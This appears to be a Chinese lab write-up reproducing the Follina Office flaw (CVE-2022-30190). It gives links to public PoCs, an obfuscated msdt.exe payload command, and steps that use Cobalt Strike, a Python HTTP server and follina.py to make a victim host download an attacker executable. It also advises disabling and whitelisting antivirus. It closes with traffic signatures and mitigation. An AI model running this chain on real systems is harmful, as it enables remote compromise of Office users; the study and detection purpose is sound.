目录
仅供学习参考使用,请勿用作违法用途,否则后果自负。
Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。
Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。另外,该漏洞在宏被禁用的情况下,仍能通过 MSDT(Microsoft Support Diagnostics Tool)功能执行代码,当恶意文件保存为 RTF 格式时,甚至无需打开文件,通过资源管理器中的预览选项卡即可在目标机器上执行任意代码。
Microsoft Office 2016、Microsoft Office 2021(其他版本有待确认)
Windows 10虚拟机(一定要把Windows Defender关闭)
参考这篇文章:
Windows 10 宿主机
Kali 虚拟机
POC1:
https://github.com/chvancooten/follina.py
https://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501POC2:
https://github.com/JohnHammond/msdt-follina
https://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
chmod +x teamserver
./teamserver ip key(key为密钥,客户端连接时候使用)
点击“Cobalt Strike”–“Listeners”—“Add”—输入“ Name” —添加“HTTP Hosts”—点击“Save”
点击“Attacks”—“Packages”—“Windows Executable”—点击“…”—选择“test”—点击“Generate”—选择一个路径存放exe(注意加白,会被杀。)
主要目的是让被害主机从这个服务上下载CS生成的exe。
python -m http.server 8080
POC地址:xxx
python follina.py -i 192.168.18.130 -p 8000 -r 6000
(注意加白,会被杀软干掉。)
宿主机8080会收到一条下载成功的日志
(请求CS生成exe应该在VPS上的,测试环境中在攻击者这边生成比较方便)
在流量分析中,发现只会有几种请求头:
User-Agent: Microsoft Office Protocol Discovery
User-Agent: Microsoft Office Word 2014
Mozilla/4.0 (compatible; ms-office; MSOffice 16)
伴随着的请求方式有:
HEAD 请求路径为 “/index.html”
OPTIONS 请求路径为 “/”
目前可参考官方文档禁用 MSDT URL 协议或通过 Microsoft Defender 检测和保护系统。
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/